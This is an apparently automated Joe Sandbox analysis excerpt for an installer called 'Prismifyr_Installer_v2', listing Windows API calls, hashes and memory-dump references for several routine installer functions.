                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                                                          • API String ID: 163830602-2366072709
                                                                                                                                                                                                                          • Opcode ID: 14dc679b194e2ee8669cd1598f353bf1a997ac59cdf020ac1a3b5a5ea93b2031
                                                                                                                                                                                                                          • Instruction ID: 75c70889326ed48cf653b65eedce39ba48716a77e36bbd16e72a3e0392bfe49c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14dc679b194e2ee8669cd1598f353bf1a997ac59cdf020ac1a3b5a5ea93b2031
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C511975D00219AEDF219F95DA88AAEB779FF04304F10443BE901B72D0DBB89982CB58
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
                                                                                                                                                                                                                          • GetMessagePos.USER32 ref: 00404C0F
                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404C29
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                                                          • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                                                          • Instruction ID: 457ccdd811883e010b73e4973708530e0d9e00004b69c5e73a61d7a3cd07de8f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF015271900218BAEB10DBA4DD85BFEBBBCAF95711F10412BBA50B71D0D7B499018BA4
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(0041E5D0), ref: 00401E3E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                          • String ID: MS Shell Dlg
                                                                                                                                                                                                                          • API String ID: 3808545654-76309092
                                                                                                                                                                                                                          • Opcode ID: 0e1e500c30e805fc948415589c08143fac03f34b0e69f739ebe91b2620e6c296
                                                                                                                                                                                                                          • Instruction ID: 2f87ef527a079fcd98b3174ff93e15f92fad6858fb92d4176ae60913c966d855
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1e500c30e805fc948415589c08143fac03f34b0e69f739ebe91b2620e6c296
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A01B575604240BFE700ABF1AE0ABDD7FB5AB55309F10887DF641B61E2DA7840458B2D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                                                                                                          • MulDiv.KERNEL32(05DD611C,00000064,05DD6120), ref: 00402E3C
                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                                                                          • Opcode ID: 087799c81dd47644162d60d698aafe3a885b0c6ac9c219555e2ca42e9c1670eb
                                                                                                                                                                                                                          • Instruction ID: dfd142ddc65d39fdaa73b229a9921dc7c235b7e072e3123d651e00bd55f03bcf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 087799c81dd47644162d60d698aafe3a885b0c6ac9c219555e2ca42e9c1670eb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60014F7164020CABEF209F60DE49FAE3B69AB44304F008439FA06B51E0DBB895558B98
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2667972263-0
                                                                                                                                                                                                                          • Opcode ID: ff87bf99e36aab27b6384dee017154e4bdeff7ac382f3b09721b2446f84e6f42
                                                                                                                                                                                                                          • Instruction ID: 85d8fb478e53a7d33050a02afe9876517184a336e4e72b82bbd0c3cba42884f9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff87bf99e36aab27b6384dee017154e4bdeff7ac382f3b09721b2446f84e6f42
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D121AEB1800128BBDF116FA5DE89DDE7E79EF08364F14423AF960762E0CB794C418B98
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,004DF000,004DF000,004CB000,0040336A,004DF000,76233420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                                                                                                          • CharNextW.USER32(?,00000000,004DF000,004DF000,004CB000,0040336A,004DF000,76233420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                                                                                                          • CharPrevW.USER32(?,?,004DF000,004DF000,004CB000,0040336A,004DF000,76233420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                                                          • String ID: *?|<>/":
                                                                                                                                                                                                                          • API String ID: 589700163-165019052
                                                                                                                                                                                                                          • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                                                                                          • Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsyC753.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsyC753.tmp\StdUtils.dll,00002000,?,?,00000021), ref: 004025E8
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsyC753.tmp\StdUtils.dll,?,?,C:\Users\user\AppData\Local\Temp\nsyC753.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsyC753.tmp\StdUtils.dll,00002000,?,?,00000021), ref: 004025F3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsyC753.tmp$C:\Users\user\AppData\Local\Temp\nsyC753.tmp\StdUtils.dll
                                                                                                                                                                                                                          • API String ID: 3109718747-2970863816
                                                                                                                                                                                                                          • Opcode ID: 991fae946bdf019a7c315e2a20c045ecd4589044c4e58f1009f440a7fe048d5b
                                                                                                                                                                                                                          • Instruction ID: b23dc685b5da5394ac89c8ab13f2cbf985e24fd8d9932a4f5164fd221fdd45c5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 991fae946bdf019a7c315e2a20c045ecd4589044c4e58f1009f440a7fe048d5b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76110B72A04201BADB146FF18E89A9F76659F44398F204C3FF102F61D1EAFC89415B5D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
